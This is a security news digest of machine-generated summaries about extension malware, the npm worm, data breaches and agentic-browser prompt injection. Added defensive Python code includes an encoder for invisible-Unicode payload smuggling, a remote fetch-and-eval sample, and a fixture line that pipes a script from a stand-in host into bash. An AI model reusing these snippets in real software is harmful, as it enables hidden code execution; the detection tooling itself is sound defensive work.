Daily Brief

Article summaries below are machine-generated.

2025-12-01 21:08:35 bleepingcomputer MALWARE Glassworm Malware Resurfaces in VS Code Extension Marketplaces
GlassWorm has reappeared in the Open VSX registry and the Visual Studio Marketplace with 24 new malicious extensions aimed at developers. First identified by Koi Security, GlassWorm hides its payload in invisible Unicode characters, so the malicious code is not visible in an ordinary code review. The malware steals GitHub, npm and cryptocurrency wallet credentials and installs a SOCKS proxy that routes attacker traffic through the victim machine. Researchers found the campaign has evolved: extensions now carry Rust-based implants, and download counts are still being inflated to make the packages look established. Secure Annex's John Tuckner noted that the new wave targets developers working with popular frameworks such as Flutter, React Native and Vue. Despite earlier takedowns, GlassWorm has returned, prompting a renewed investigation and response from Open VSX and Microsoft. The campaign again shows that extension marketplaces need stronger controls to protect developers and their environments.
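The review-evasion trick in the GlassWorm item is the detectable part: code points that render as nothing still sit in the file bytes, so a pre-commit or CI scan catches what a human diff does not. The following is an added example, not code from the article or from any vendor, showing a scanner for invisible code points and a decoder for the byte-in-variation-selector layout. The code-point ranges and the encoding (VS1-VS16 carry 0-15, VS17-VS256 carry 16-255) are assumptions taken from the widely published smuggling scheme, not from the article; the sample source text is constructed.

```python
"""Find invisible Unicode code points in source text and recover bytes hidden in variation selectors."""
import unicodedata

# Ranges that render as nothing (or attach invisibly to the preceding glyph) and
# so survive a visual code review. The variation-selector and tag ranges can carry
# a byte each; the rest are zero-width and bidi controls.
# Assumption: an illustrative list for this example, not an exhaustive one.
INVISIBLE_RANGES = (
    (0x200B, 0x200F),    # zero-width space/non-joiner/joiner, LRM, RLM
    (0x202A, 0x202E),    # bidi embedding and override controls
    (0x2060, 0x2064),    # word joiner and invisible operators
    (0x2066, 0x2069),    # bidi isolates
    (0xFE00, 0xFE0F),    # variation selectors VS1-VS16
    (0xFEFF, 0xFEFF),    # zero-width no-break space / BOM
    (0xE0000, 0xE007F),  # Unicode tag characters
    (0xE0100, 0xE01EF),  # variation selectors supplement VS17-VS256
)


def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES):
        return True
    # Anything else in general category Cf ("format") never produces a glyph.
    return unicodedata.category(ch) == "Cf"


def scan_source(text: str) -> list[tuple[int, int, str, str]]:
    """Return (line, column, code point, Unicode name) for every hidden character."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if is_invisible(ch):
                hits.append((line_no, col, f"U+{ord(ch):04X}",
                             unicodedata.name(ch, "<unnamed>")))
    return hits


# One-byte-per-selector scheme: VS1..VS16 carry 0..15, VS17..VS256 carry 16..255.
# Assumption: this is the published "variation selector smuggling" layout, used
# here to illustrate the technique; GlassWorm's exact encoding is not taken from
# the article.
def encode_variation_selectors(data: bytes) -> str:
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


def decode_variation_selectors(text: str) -> bytes:
    """Extract the hidden bytes from any variation selectors in text, ignoring other characters."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)


# Constructed sample: a hidden payload appended to a harmless line, a legitimate
# non-ASCII string that must not be flagged, and a zero-width space inside an identifier.
HIDDEN = encode_variation_selectors(b"eval(x)")
SAMPLE_SOURCE = (
    "const greeting = 'hello';" + HIDDEN + "\n"
    "const nombre = 'José';\n"
    "if (a\u200bdmin) grant();\n"
)

if __name__ == "__main__":
    for line_no, col, cp, name in scan_source(SAMPLE_SOURCE):
        print(f"line {line_no} col {col}: {cp} {name}")
    print("hidden bytes:", decode_variation_selectors(SAMPLE_SOURCE))
```

Flagging by range plus the Cf category keeps legitimate non-ASCII letters (the "José" line) out of the report while still catching the zero-width space spliced into an identifier, which is the Trojan Source style of abuse rather than a payload carrier.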
2025-12-01 19:20:46 theregister MALWARE ShadyPanda Campaign Infects Millions via Malicious Browser Extensions
A seven-year campaign by ShadyPanda infected 4.3 million Chrome and Edge users with malware, utilizing extensions to deploy backdoors and spyware. These extensions initially appeared legitimate, gaining trust with high install counts and favorable reviews before deploying malicious updates. The malware facilitated extensive surveillance, capturing browsing data, injecting content, and executing remote code with full browser API access. Despite removal from Chrome and Edge stores, the infrastructure for potential attacks remains active on infected browsers. Google confirmed the removal of these extensions from its store, while Microsoft has not commented on their status in the Edge marketplace. The campaign's success highlights vulnerabilities in extension review processes, where updates are not continuously monitored post-approval. ShadyPanda's activities include earlier campaigns that monetized user data through affiliate tracking and browser hijacking. The ongoing threat emphasizes the need for improved oversight and security measures in browser extension marketplaces.
2025-12-01 18:56:26 bleepingcomputer MALWARE SmartTube Android TV App Compromised, Malicious Update Deployed
The SmartTube YouTube client for Android TV was compromised after an attacker obtained the developer's signing keys and pushed a malicious update. Users first noticed the problem when Play Protect began blocking SmartTube; the developer then acknowledged the breach and promised a clean release. The compromised version 30.51 ships a suspicious native library, libalphasdk.so, which fingerprints the device and talks to a remote backend without the user's knowledge. No direct abuse such as account theft has been reported so far, but the capability is there. Developer Yuriy Yuliskov has announced clean beta and stable test builds, though the official GitHub repository has not yet been updated, which has undermined user trust. Users are advised to fall back to an older known-good build, avoid signing in with premium accounts, and disable auto-updates until a full post-mortem is published. Anyone who ran the compromised build should reset their Google Account password, review the account for unauthorised access, and remove any services they do not recognise. The timeline of the breach and the exact set of safe versions remain unclear pending further investigation and communication from the developer.
2025-12-01 18:03:41 theregister CYBERCRIME Global Crackdown on Cybercrime Targets IP Cameras, Wi-Fi, and Dark Web
South Korean authorities arrested four individuals for compromising more than 120,000 IP cameras, targeting sensitive locations to produce and sell illicit footage online. The suspects got in by using unchanged factory passwords and made significant profits selling the footage on an undisclosed website. In Australia, a man investigated by the Australian Federal Police was sentenced to more than seven years for setting up fake Wi-Fi networks at airports to harvest credentials and then use them to access victims' accounts and personal data; he also tried to erase digital evidence and improperly accessed his employer's systems during the investigation. In England, a man was sentenced for running a dark web drug operation, distributing various illegal substances from his rural home. Authorities stress changing default passwords and treating public Wi-Fi with caution as the basic defences against these attacks. The cases illustrate the global reach and varied methods of cybercriminals and the need for coordinated international law enforcement.
2025-12-01 18:03:40 thehackernews CYBERCRIME India Mandates Pre-Installation of Anti-Fraud App on New Mobile Devices
India's telecommunications ministry mandates pre-installation of the Sanchar Saathi app on all new mobile devices within 90 days to combat telecom fraud and enhance cybersecurity. The app, which cannot be removed or disabled, enables users to report fraud, spam, and malicious links, block stolen handsets, and check mobile connections under their name. A key feature allows reporting of international calls disguised as domestic, aiding government actions against illegal telecom setups that threaten national security. Since its May 2023 launch, the app has been installed over 11.4 million times, blocking 4.2 million lost devices and recovering over 723,000. The directive requires manufacturers to update existing supply chain phones with the app, addressing threats like spoofed IMEI numbers used in scams. This move aligns India with countries like Russia, which also mandates pre-installed apps for cybersecurity, though critics raise concerns over potential user tracking. The initiative reflects growing global trends in government-led cybersecurity measures amidst increasing telecom fraud and security threats.
2025-12-01 17:36:22 thehackernews MALWARE ShadyPanda Converts Browser Extensions into Spyware Affecting Millions
ShadyPanda, a threat actor, turned legitimate browser extensions into spyware affecting more than 4.3 million users worldwide, according to Koi Security's report. Five extensions that had previously passed Google's review were modified in mid-2024 to execute remotely supplied code, exfiltrating browsing data and monitoring user activity. The extensions committed affiliate fraud by injecting tracking codes into e-commerce sites, earning commissions on users' purchases. The operation later added browser hijacking, redirecting search queries through a known hijacker site, and cookie exfiltration for profit. The extensions used heavy obfuscation and adversary-in-the-middle techniques that enable credential theft and session hijacking without arousing suspicion. Although some of the extensions have been removed, others such as WeTab remain available and continue to surveil users. Users are advised to uninstall the affected extensions and rotate their credentials to limit exposure. The campaign shows why extensions need continuous monitoring after approval: the trusted update channel is exactly what was abused.
2025-12-01 16:32:09 bleepingcomputer DATA BREACH Coupang Data Breach Exposes Personal Information of 33.7 Million Customers
Coupang, South Korea's largest retailer, suffered a data breach affecting 33.7 million customers, exposing personal data such as names, phone numbers, and addresses. The breach was discovered on November 18, 2025, but the unauthorised access dates back to June 24, 2025, a detection delay of almost five months. Payment information, including card data, and passwords were reportedly not compromised, limiting direct financial exposure. Coupang has informed the relevant authorities, including the National Police Agency and the Personal Information Protection Commission, and is notifying affected customers by email and SMS. The breach reportedly involved a former employee using access tokens that were never revoked after departure, although Coupang has not confirmed this. It is the second major breach in South Korea this year, following the large-scale incident at SK Telecom. Customers are advised to watch for phishing and other messages impersonating Coupang, since the leaked data makes targeted social engineering easier.
2025-12-01 15:37:36 bleepingcomputer CYBERCRIME Insider Threats: Cybercriminals Impersonating Employees to Breach Data
Cybercriminals are posing as cybersecurity and IT professionals to gain insider access, manipulating the hiring process to infiltrate organizations and access sensitive data. These imposters create fake personas using deepfake technology and fabricated resumes, exploiting remote work environments to bypass traditional identity verification. The primary objectives of these fake workers include data theft, financial fraud, and cyber espionage, posing significant risks to company reputation and compliance. North Korean operatives have been identified using fake identities to secure remote tech jobs, generating illicit revenue and exfiltrating sensitive information. Companies are advised to implement multi-factor identity validation, thorough background checks, and secure onboarding protocols to mitigate these threats. Advanced technical controls such as network segmentation, user activity monitoring, and hardware-based multi-factor authentication are recommended to enhance security. Managed Service Providers face heightened risks due to their access to multiple client systems, necessitating stringent security measures and tailored incident response plans. Continuous security awareness training and vigilance for warning signs can help organizations protect against these sophisticated insider threats.
2025-12-01 15:08:53 bleepingcomputer MALWARE ShadyPanda Browser Extensions Exploit 4.3 Million Users with Malware
ShadyPanda, a long-running malware campaign, has infected more than 4.3 million users through Chrome and Edge browser extensions that started out as apparently legitimate productivity tools. Koi Security discovered the operation, which evolved in phases, adding spyware capabilities to extensions that initially did nothing harmful. The campaign spans 145 extensions, 125 on Edge and 20 on Chrome; Google has removed its share from the Chrome Web Store, but some remain available on Edge. The extensions committed affiliate fraud by injecting tracking codes into e-commerce links, earning commissions on users' purchases. A backdoor introduced in 2024 enabled remote code execution and exfiltration of browsing URLs and user identifiers, with the stolen data AES-encrypted in transit. The final phase centres on five Edge extensions with a combined 4 million installs, whose spyware components send data to 17 domains in China. Users are advised to uninstall the extensions and reset their passwords, as the campaign remains active on Microsoft Edge.
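All three ShadyPanda items make the same point: a benign extension passed review, then a later update widened its permissions and started pulling code from a remote server. That is a diff a marketplace or an enterprise allow-list process can run on every update. The block below is an added example, not code from the articles or from Koi Security, showing a review gate that diffs two manifest versions for newly added high-risk capabilities and greps the shipped bundle for remote-code loading. The high-risk permission list, the regex patterns, the manifests and the bundle snippet are all constructed for this example, not taken from the real extensions.

```python
"""Gate a browser-extension update: diff the manifest's capabilities and grep the bundle for remote-code loading."""
import json
import re

# Capabilities that let an extension read or rewrite every site the user visits.
# Assumption: an illustrative list for this example, not a store's actual policy.
HIGH_RISK = {
    "<all_urls>", "cookies", "tabs", "history", "webRequest", "webRequestBlocking",
    "scripting", "declarativeNetRequest", "webNavigation",
}

# Patterns that turn a static, reviewed bundle into a loader for code nobody reviewed.
REMOTE_CODE = {
    "eval": re.compile(r"\beval\s*\("),
    "function-constructor": re.compile(r"\bnew\s+Function\s*\("),
    "import-scripts": re.compile(r"\bimportScripts\s*\("),
    "fetch-remote-url": re.compile(r"\bfetch\s*\(\s*[\"'`]https?://"),
    "remote-script-src": re.compile(r"\.src\s*=\s*[\"'`]https?://"),
}


def _capabilities(manifest: dict) -> set[str]:
    return (set(manifest.get("permissions", []))
            | set(manifest.get("host_permissions", []))
            | set(manifest.get("optional_permissions", [])))


def diff_manifest(old: dict, new: dict) -> dict:
    added = _capabilities(new) - _capabilities(old)
    old_cs = old.get("content_scripts", [])
    return {
        "version": f"{old.get('version')} -> {new.get('version')}",
        "added": sorted(added),
        "added_high_risk": sorted(added & HIGH_RISK),
        # Content scripts that did not exist in the previous version, keyed by match pattern.
        "new_content_scripts": [cs.get("matches", []) for cs in new.get("content_scripts", []) if cs not in old_cs],
    }


def scan_bundle(js: str) -> list[str]:
    return [name for name, rx in REMOTE_CODE.items() if rx.search(js)]


def review_update(old: dict, new: dict, bundle_js: str) -> dict:
    report = diff_manifest(old, new)
    report["remote_code"] = scan_bundle(bundle_js)
    report["hold_for_review"] = bool(report["added_high_risk"] or report["new_content_scripts"] or report["remote_code"])
    return report


# Constructed sample: a tidy 1.4.0 manifest and a 1.5.0 update that quietly widens its reach.
OLD_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Tab Organizer", "version": "1.4.0",
  "permissions": ["storage"],
  "host_permissions": ["https://sync.tabs.example/*"]
}""")
NEW_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Tab Organizer", "version": "1.5.0",
  "permissions": ["storage", "cookies", "tabs", "webRequest"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
  "background": {"service_worker": "bg.js"}
}""")
BUNDLE_JS = """
const r = await fetch("https://cfg.tabs.example/" + chrome.runtime.id);
eval(await r.text());
"""

if __name__ == "__main__":
    print(json.dumps(review_update(OLD_MANIFEST, NEW_MANIFEST, BUNDLE_JS), indent=2))
```

The gate deliberately compares against the version that was actually approved, not against the author's stated changelog, because the whole ShadyPanda playbook is to earn trust with a harmless first version and spend it in a later one. An update that adds `<all_urls>` plus `cookies` and an `eval` over fetched text should never ship on the strength of its previous review.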
2025-12-01 15:00:28 theregister CYBERCRIME Dutch Study Reveals Teen Cybercrime Often Temporary, Driven by Curiosity
A Dutch government report finds that teenage cybercriminals typically abandon illegal activities by age 20, with only a small percentage continuing into adulthood. The study compares teenage cyber offenses to other crimes like drug and weapon offenses, noting they are among the least common adolescent crimes. Research shows that young cybercriminals often reach peak activity around age 20, though this can vary slightly by decade. Only about 4% of teenage offenders continue cybercriminal activities beyond their early 20s, often due to a sustained interest in technology. The report acknowledges the lack of comprehensive longitudinal data on cybercrime, making it challenging to assess its social cost accurately. The Netherlands faces an annual social cost of €10.3 billion from adolescent crime, with cybercrime contributing significantly despite being hard to quantify. A UK study highlights the economic impact of cybercrime, with major hospital attacks costing approximately £11.14 million annually, underscoring its financial burden. The Dutch government's reluctance to quantify cybercrime costs reflects the complexity of measuring impacts like intellectual property theft and psychological effects.
2025-12-01 13:18:37 theregister DATA BREACH Coupang Data Breach Exposes Personal Details of 33.7 Million Customers
Coupang, South Korea's largest retail platform, confirmed a breach affecting 33.7 million customers, exposing personal details such as names, emails, phone numbers, and shipping addresses. The breach, initially detected on November 18, was traced back to June 24, with unauthorized access originating from overseas servers, compromising more than half of South Korea's population. Coupang reported the incident to local authorities, including the National Police Agency and the Korea Internet & Security Agency, and has enhanced internal security measures. The breach did not compromise login credentials or payment card details, which remain secure according to Coupang's statement. Local media suggest the breach may involve a former Coupang employee who allegedly used an active authentication key post-resignation to leak data. Coupang has warned customers to be vigilant against phishing attempts and issued public apologies for the incident's impact. The breach follows a recent incident involving SK Telecom, highlighting vulnerabilities in South Korea's major commerce and communication sectors. Coupang's response includes engaging an independent security firm to investigate, though the company has not disclosed the firm's identity.
2025-12-01 12:53:25 thehackernews MALWARE Shai-Hulud Worm Targets npm Registry, Compromises Supply Chains
A self-replicating worm tracked as "Sha1-Hulud: The Second Coming", the successor to the earlier Shai-Hulud worm, hit the npm registry, affecting more than 800 packages and 27,000 GitHub repositories. The malware harvests sensitive data, including API keys and authentication tokens, and uses them to push further into downstream supply chains. It creates GitHub Actions workflows for command and control and injects its payload into additional npm packages under the compromised maintainers' control. By downloading and installing the Bun runtime as part of package installation and running its payload under Bun rather than Node.js, the worm sidesteps defences tuned to Node.js behaviour. GitGuardian counted 294,842 secret occurrences in the exposed data, 3,760 of them still valid, including GitHub tokens and AWS IAM keys. Trigger.dev reported credential theft and unauthorised access to its GitHub organisation after installing a compromised package. The Python Package Index (PyPI) confirmed it was not affected by this incident.
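The worm gets its foothold where npm hands it one: install-time lifecycle scripts run automatically on every machine that pulls the package, and a script that fetches a second runtime and re-executes under it is exactly the "not Node.js" trick the summary describes. The following is an added example, not code from the article or from any of the named vendors, showing an audit of package.json lifecycle hooks that logs every install-time hook and blocks on the ones whose command looks like a loader stage. The pattern set and the sample package.json documents are constructed for this example; the script names only echo the summary's description of a Bun bootstrap and are not claimed to match the real worm's files.

```python
"""Flag npm packages whose install-time lifecycle scripts look like a loader or dropper stage."""
import json
import re

# npm runs these hooks automatically during `npm install`, so they are where a
# worm gains execution on every developer and CI machine that pulls the package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "preprepare", "prepare", "postprepare")

# Commands that fetch or bootstrap a second stage. Assumption: illustrative
# heuristics chosen for this example, not a vendor's signature set.
SUSPICIOUS = {
    "downloads-remote-content": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b"),
    "bootstraps-bun-runtime": re.compile(r"\bbun\b|bun\.sh|setup_bun"),
    "inline-node-eval": re.compile(r"\bnode\s+(-e|--eval)\b"),
    "pipes-to-shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)\b|\batob\("),
}


def audit_package(pkg: dict) -> list[dict]:
    """One finding per install hook present; `reasons` is empty when the hook looks benign."""
    findings = []
    scripts = pkg.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append({
            "package": f"{pkg.get('name')}@{pkg.get('version')}",
            "hook": hook,
            "command": cmd,
            "reasons": [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)],
        })
    return findings


def audit_packages(packages: list[dict]) -> list[dict]:
    return [f for pkg in packages for f in audit_package(pkg)]


def should_block(findings: list[dict]) -> bool:
    """Block the install when any hook matches a suspicious pattern; plain hooks are only logged."""
    return any(f["reasons"] for f in findings)


# Constructed sample package.json documents: two legitimate, two that behave like a worm stage.
SAMPLE_PACKAGES = [json.loads(s) for s in (
    '{"name": "tiny-utils", "version": "1.0.0", "scripts": {"build": "tsc", "test": "jest"}}',
    '{"name": "native-thing", "version": "2.1.0", "scripts": {"postinstall": "node-gyp rebuild"}}',
    '{"name": "cli-helper", "version": "3.4.1", "scripts": {"preinstall": "node setup_bun.js && bun bun_environment.js"}}',
    '{"name": "color-pad", "version": "0.9.2", "scripts": {"postinstall": "curl -s https://drop.example/i.sh | bash"}}',
)]

if __name__ == "__main__":
    results = audit_packages(SAMPLE_PACKAGES)
    for f in results:
        print(f"{f['package']:<18} {f['hook']:<12} {f['reasons'] or 'no match'}  {f['command']}")
    print("block install:", should_block(results))
```

Native modules legitimately use `postinstall` (the `node-gyp rebuild` case), so the audit keeps "has an install hook" and "install hook looks like a dropper" as separate signals; the cheaper, broader control is still `npm install --ignore-scripts` in CI, with explicit rebuild steps for the few packages that need them.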
2025-12-01 11:57:40 thehackernews VULNERABILITIES Security Challenges Emerge with New Agentic AI Browsers
Agentic AI browsers turn the browser from a passive viewing tool into an autonomous agent that acts on the user's behalf, which changes the threat model. Products such as OpenAI's ChatGPT Atlas execute tasks on their own and therefore run with broad privileges, including access to session cookies and stored credentials, which creates a large attack surface. Attackers can steer them through prompt injection in page content; because the agent already holds an authenticated session, controls such as multi-factor authentication do not stop the injected actions. Traditional security tooling has little visibility, since the agent's activity happens locally inside the browser and its network traffic is encrypted. Organisations should treat agentic browsers as a distinct endpoint risk and adapt their controls accordingly. The article closes by pointing security leaders to a webinar on securing AI browsers.
2025-12-01 11:49:28 theregister DATA BREACH French Football Federation Data Breach Compromises Player Information
The French Football Federation (FFF) experienced a data breach through a compromised account, affecting its member management software and exposing player data. The breach involved the unauthorized access of personal information, including names, birth details, contact information, and license numbers of members. The FFF swiftly disabled the compromised account, reset all user passwords, and secured the software to prevent further unauthorized access. No financial or national identity data was compromised, minimizing potential financial fraud risks for affected individuals. The FFF has filed a criminal complaint and informed French cybersecurity and data protection authorities, ANSSI and CNIL, to address the incident. Members have been advised to exercise caution with emails claiming to be from the FFF, especially those requesting sensitive information or containing attachments. The breach highlights the need for robust cybersecurity measures as the FFF enhances its defenses against the rising tide of cyber threats.
2025-12-01 09:02:35 bleepingcomputer CYBERCRIME International Operation Shuts Down Cryptomixer Cryptocurrency Laundering Service
Swiss and German authorities dismantled Cryptomixer, a cryptocurrency mixing service, seizing three servers and €24 million in Bitcoin, with support from Europol and Eurojust. Cryptomixer was used by cybercriminals to obscure the origins of funds, aiding activities such as ransomware, drug trafficking, and payment card fraud. The service operated on both the clear and dark web, providing anonymity by pooling and redistributing cryptocurrency to hinder traceability. This action follows a similar takedown of ChipMixer in March 2023, where authorities seized servers and $46.5 million in Bitcoin. Crypto mixers are often used by criminals to launder funds before converting them into fiat currency, despite having some legitimate applications. The crackdown on crypto mixers continues globally, with recent legal actions against operators of similar services like Samourai Wallet and Blender.io. These efforts aim to disrupt the financial infrastructure supporting cybercrime and enhance the traceability of illicit cryptocurrency transactions.